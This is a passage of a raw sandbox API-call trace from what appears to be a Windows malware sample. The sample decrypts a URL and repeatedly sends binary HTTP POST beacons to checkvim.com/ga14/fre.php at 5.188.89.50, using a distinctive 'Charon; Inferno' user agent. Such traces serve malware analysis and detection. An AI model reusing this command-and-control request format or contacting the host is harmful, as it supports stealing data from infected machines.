(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.265] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.266] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.266] GetProcessHeap () returned 0x840000 [0302.266] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0302.266] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0302.267] GetProcessHeap () returned 0x840000 [0302.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0302.267] GetProcessHeap () returned 0x840000 [0302.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0302.267] GetProcessHeap () returned 0x840000 [0302.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0302.267] GetProcessHeap () returned 0x840000 [0302.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0302.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.270] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0302.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.276] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0302.285] GetProcessHeap () returned 0x840000 [0302.285] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0302.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.286] CryptImportKey (in: hProv=0x86f710, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0302.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.287] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0302.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.289] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.289] GetProcessHeap () returned 0x840000 [0302.289] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0302.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.290] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0302.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.292] CryptDestroyKey (hKey=0x87e870) returned 1 [0302.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.293] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0302.293] GetProcessHeap () returned 0x840000 [0302.293] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0302.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.294] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0302.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.295] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0302.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.297] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0302.297] GetProcessHeap () returned 0x840000 [0302.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0302.297] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0302.299] GetProcessHeap () returned 0x840000 [0302.299] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0302.299] socket (af=2, type=1, protocol=6) returned 0x4e8 [0302.300] connect (s=0x4e8, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0302.364] FreeAddrInfoW (pAddrInfo=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0302.364] GetProcessHeap () returned 0x840000 [0302.364] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0302.364] GetProcessHeap () returned 0x840000 [0302.364] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0302.365] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0302.366] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0302.366] GetProcessHeap () returned 0x840000 [0302.366] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0302.366] GetProcessHeap () returned 0x840000 [0302.366] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0302.366] GetProcessHeap () returned 0x840000 [0302.366] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f908 [0302.366] GetProcessHeap () returned 0x840000 [0302.366] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0302.367] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0302.369] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0302.369] GetProcessHeap () returned 0x840000 [0302.369] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0302.369] GetProcessHeap () returned 0x840000 [0302.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0302.369] send (s=0x4e8, buf=0x873a58*, len=237, flags=0) returned 237 [0302.370] send (s=0x4e8, buf=0x87eb58*, len=159, flags=0) returned 159 [0302.370] GetProcessHeap () returned 0x840000 [0302.370] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0302.370] recv (in: s=0x4e8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0302.723] GetProcessHeap () returned 0x840000 [0302.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0302.723] GetProcessHeap () returned 0x840000 [0302.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0302.723] GetProcessHeap () returned 0x840000 [0302.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0302.723] GetProcessHeap () returned 0x840000 [0302.723] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0302.723] closesocket (s=0x4e8) returned 0 [0302.724] GetProcessHeap () returned 0x840000 [0302.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0302.724] GetProcessHeap () returned 0x840000 [0302.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0302.724] GetProcessHeap () returned 0x840000 [0302.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0302.724] GetProcessHeap () returned 0x840000 [0302.724] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0302.724] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x8a8) returned 0x4e8 [0302.726] Sleep (dwMilliseconds=0xea60) [0302.737] GetProcessHeap () returned 0x840000 [0302.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0302.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.739] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0302.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.749] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0302.755] GetProcessHeap () returned 0x840000 [0302.755] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0302.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.756] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0302.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.757] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0302.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.758] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.758] GetProcessHeap () returned 0x840000 [0302.758] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0302.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.758] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0302.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.760] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0302.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.760] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0302.760] GetProcessHeap () returned 0x840000 [0302.760] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0302.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.761] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0302.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.762] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0302.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.763] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0302.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.764] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0302.764] GetProcessHeap () returned 0x840000 [0302.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0302.764] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0302.764] GetProcessHeap () returned 0x840000 [0302.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0302.764] GetProcessHeap () returned 0x840000 [0302.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0302.764] GetProcessHeap () returned 0x840000 [0302.764] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0302.764] GetProcessHeap () returned 0x840000 [0302.764] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0302.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.765] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0302.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.769] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0302.774] GetProcessHeap () returned 0x840000 [0302.774] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0302.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.775] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0302.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.776] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0302.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.777] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0302.777] GetProcessHeap () returned 0x840000 [0302.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0302.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.777] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0302.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.778] CryptDestroyKey (hKey=0x87e730) returned 1 [0302.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0302.779] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0302.779] GetProcessHeap () returned 0x840000 [0302.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0302.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.780] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0302.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.780] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0302.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.781] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0302.781] GetProcessHeap () returned 0x840000 [0302.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0302.781] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0302.784] GetProcessHeap () returned 0x840000 [0302.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0302.784] socket (af=2, type=1, protocol=6) returned 0x4ec [0302.784] connect (s=0x4ec, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0302.851] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0302.851] GetProcessHeap () returned 0x840000 [0302.851] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0302.851] GetProcessHeap () returned 0x840000 [0302.851] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0302.852] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0302.853] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0302.853] GetProcessHeap () returned 0x840000 [0302.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0302.853] GetProcessHeap () returned 0x840000 [0302.853] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0302.853] GetProcessHeap () returned 0x840000 [0302.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0302.853] GetProcessHeap () returned 0x840000 [0302.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0302.854] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0302.854] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0302.854] GetProcessHeap () returned 0x840000 [0302.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0302.854] GetProcessHeap () returned 0x840000 [0302.855] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0302.855] send (s=0x4ec, buf=0x873a58*, len=237, flags=0) returned 237 [0302.855] send (s=0x4ec, buf=0x87eb58*, len=159, flags=0) returned 159 [0302.855] GetProcessHeap () returned 0x840000 [0302.855] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0302.855] recv (in: s=0x4ec, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0303.226] GetProcessHeap () returned 0x840000 [0303.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0303.226] GetProcessHeap () returned 0x840000 [0303.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0303.227] GetProcessHeap () returned 0x840000 [0303.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0303.227] GetProcessHeap () returned 0x840000 [0303.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0303.227] closesocket (s=0x4ec) returned 0 [0303.227] GetProcessHeap () returned 0x840000 [0303.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0303.227] GetProcessHeap () returned 0x840000 [0303.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0303.227] GetProcessHeap () returned 0x840000 [0303.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0303.227] GetProcessHeap () returned 0x840000 [0303.227] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0303.233] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x6a0) returned 0x4ec [0303.235] Sleep (dwMilliseconds=0xea60) [0303.238] GetProcessHeap () returned 0x840000 [0303.238] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0303.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.239] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0303.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.256] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0303.261] GetProcessHeap () returned 0x840000 [0303.261] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0303.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.262] CryptImportKey (in: hProv=0x86f798, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0303.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.263] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0303.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.264] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.264] GetProcessHeap () returned 0x840000 [0303.264] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0303.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.265] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0303.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.266] CryptDestroyKey (hKey=0x87e970) returned 1 [0303.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0303.267] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0303.267] GetProcessHeap () returned 0x840000 [0303.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0303.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.267] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.268] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.269] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.270] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.270] GetProcessHeap () returned 0x840000 [0303.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0303.270] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0303.270] GetProcessHeap () returned 0x840000 [0303.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0303.270] GetProcessHeap () returned 0x840000 [0303.270] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0303.270] GetProcessHeap () returned 0x840000 